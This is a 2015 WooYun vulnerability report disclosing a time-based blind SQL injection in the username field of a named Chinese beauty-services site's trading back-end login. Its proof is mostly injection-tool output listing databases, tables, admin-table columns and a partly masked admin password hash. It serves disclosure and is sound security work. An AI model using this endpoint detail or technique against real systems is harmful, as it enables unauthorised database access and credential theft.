漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0141629
漏洞标题:臭美网交易后台存在SQL注入(已获取管理员账号密码)
相关厂商:深圳市臭美文化传播有限公司
漏洞作者: 三浪兄
提交时间:2015-09-16 18:48
修复时间:2015-11-01 10:04
公开时间:2015-11-01 10:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开
简要描述:
影响到上万商家!!!
.
.
.
.
.
(我猜的,你厂有上万商家吗???)
详细说明:
交易后台http://jiaoyi.choumei.cn/Login/index.html username存在延时注入。
管理员登陆密码hash值已打马。。。哦,码,勿扰。
漏洞证明:
available databases [3]:
[*] cm_choumeionline
[*] cm_service
[*] information_schema
1
[14:52:12] [INFO] adjusting time delay to 1 second due to good response times
61
[14:52:16] [INFO] retrieved: cm_activity
[14:53:15] [INFO] retrieved: cm_addedserv
[14:54:08] [ERROR] invalid character detected. retrying..
[14:54:08] [WARNING] increasing time delay to 2 seconds
ice
[14:54:31] [INFO] retrieved: cm_addedservice_itemtype
[14:56:36] [INFO] retrieved: cm_addedservice_salon
[14:58:02] [INFO] retrieved: cm_admin_user
[14:59:29] [INFO] retrieved: cm_bounty_activity
[15:02:01] [INFO] retrieved: cm_bounty_comment
[15:03:33] [INFO] retrieved: cm_bounty_friends
[15:05:00] [INFO] retrieved: cm_bounty_order
[15:06:11] [INFO] retrieved: cm_bounty_push
[15:07:18] [INFO] retrieved: cm_bounty_request
[15:08:44] [INFO] retrieved: cm_bounty_task
[15:09:44] [INFO] retrieved: cm_bounty_task_20150907182500
[15:12:32] [INFO] retrieved: cm_business_staf
[15:14:34] [INFO] adjusting time delay to 1 second due to good response times
f
[15:14:39] [INFO] retrieved: cm_category
[15:15:25] [INFO] retrieved: cm_city
[15:15:47] [INFO] retrieved: cm_collect
[15:16:27] [INFO] retrieved: cm_comment_filter
[15:17:41] [INFO] retrieved: cm_commission
[15:18:22] [INFO] retrieved: cm_commission_log
[15:19:04] [INFO] retrieved: cm_company_code
[15:20:02] [INFO] retrieved: cm_company_code_collect
[15:21:05] [INFO] retrieved: cm_company_code_user
[15:21:46] [INFO] retrieved: cm_country
[15:22:23] [INFO] retrieved: cm_coupon
[15:22:51] [INFO] retrieved: cm_coupon_config
[15:23:41] [INFO] retrieved: cm_coupon_info
[15:24:17] [INFO] retrieved: cm_coupon_iphone
[15:25:02] [INFO] retrieved: cm_coupon_order_ticket_temp
[15:26:51] [INFO] retrieved: cm_coupon_statics
[15:27:39] [INFO] retrieved: cm_coupon_temp
[15:28:16] [INFO] retrieved: cm_crm_logs
[15:29:02] [INFO] retrieved: cm_depart
[15:29:43] [ERROR] invalid character detected. retrying..
[15:29:43] [WARNING] increasing time delay to 2 seconds
ments
[15:30:33] [INFO] retrieved: cm_device
[15:31:19] [INFO] retrieved: cm_dispose_order
[15:33:24] [INFO] retrieved: cm_dividend
[15:34:32] [INFO] retrieved: cm_dividend_set
[15:35:37] [INFO] retrieved: cm_event_conf
[15:37:26] [INFO] retrieved: cm_eventbanner
Database: cm_choumeionline
Table: cm_admin_user
[15 columns]
+--------------+----------------------+
| Column | Type |
+--------------+----------------------+
| action_list | text |
| add_time | int(11) |
| agency_id | smallint(5) unsigned |
| ec_salt | varchar(10) |
| email | varchar(60) |
| lang_type | varchar(50) |
| last_ip | varchar(15) |
| last_login | int(11) |
| nav_list | text |
| password | varchar(32) |
| role_id | smallint(5) |
| suppliers_id | smallint(5) unsigned |
| todolist | longtext |
| user_id | smallint(5) unsigned |
| user_name | varchar(60) |
+———————+----------------------+
Database: cm_choumeionline
Table: cm_admin_user
[1 entry]
+----------------+----------------------------------+---------+-----------+
| email | password | user_id | user_name |
+----------------+----------------------------------+---------+-----------+
| [email protected] | 258448ee1a31bb7eb223adc0f0******| 1 | choumei |
+----------------+----------------------------------+---------+-----------+
修复方案:
妈妈说,要过滤。
版权声明:转载请注明来源 三浪兄@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-09-17 10:02
厂商回复:
正在处理。
最新状态:
暂无